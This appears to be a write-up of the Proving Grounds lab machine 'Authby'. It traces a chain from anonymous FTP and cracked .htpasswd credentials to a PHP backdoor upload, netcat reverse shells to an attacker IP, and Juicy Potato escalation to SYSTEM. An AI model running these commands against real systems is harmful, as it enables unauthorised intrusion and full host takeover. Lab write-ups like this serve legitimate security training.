Authby

Writeup for Authby from Offensive Security Proving Grounds (PG)

Service Enumeration

nmapAutomator.sh -H 192.168.85.46 -t full

nmapAutomator.sh -H 192.168.85.46 -t vulns

FTP

Anonymous login allowed.

While we cannot access these files, we can see that there are some account names.

Using the account admin:admin, we get access to some other files.

The .htaccess and .htpasswd files are leaked.

.htaccess

AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
<Limit GET POST PUT>
Require valid-user
</Limit>

.htpasswd

offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

Passing the .htpasswd hash into John the Ripper, we find the credentials to authenticate into the HTTP server.

RDP

Nonstandard Ports

HTTP

Using the previously found credentials (offsec:elite), we can authenticate into the application.

Subdirectory Enumeration

gobuster dir -u http://192.168.85.46:242/ -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite

gobuster dir -u http://192.168.85.46:242/phpmyadmin -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401

Exploitation

Using the PHP backdoor from /usr/share/webshells/php/simple-backdoor.php, we can upload this backdoor through the admin FTP account to the web root. Then, we can visit the simple-backdoor.php and use the cmd= parameter to achieve RCE.

Copy nc.exe through SMB:

http://192.168.85.46:242/simple-backdoor.php?cmd=copy \\192.168.49.85\ROPNOP\netcat\nc.exe .

Trigger a reverse shell:

http://192.168.85.46:242/simple-backdoor.php?cmd=nc.exe -e cmd.exe 192.168.49.85 443

On our listening machine, we get a reverse shell.

Privilege Escalation

First, we know that SeImpersonatePrivilege is enabled.

We can perform privilege escalation using Juicy Potato.

However, there are two challenges.

This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here: https://github.com/ivanitlearning/Juicy-Potato-x86/releases
The default CLSID doesn't work. Juicy Potato will return COM -> recv failed with error: 10038.

systeminfo shows that this is Windows Server 2008.

We can use one of the BITS CSLIDs from here: https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise. I used {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}.

Now, we can use the nc.exe we transferred previously to get another reverse shell, this time with SYSTEM privileges.

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 192.168.49.85 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

On our listening machine:

PreviousWebCal NextPelican

Last updated 3 years ago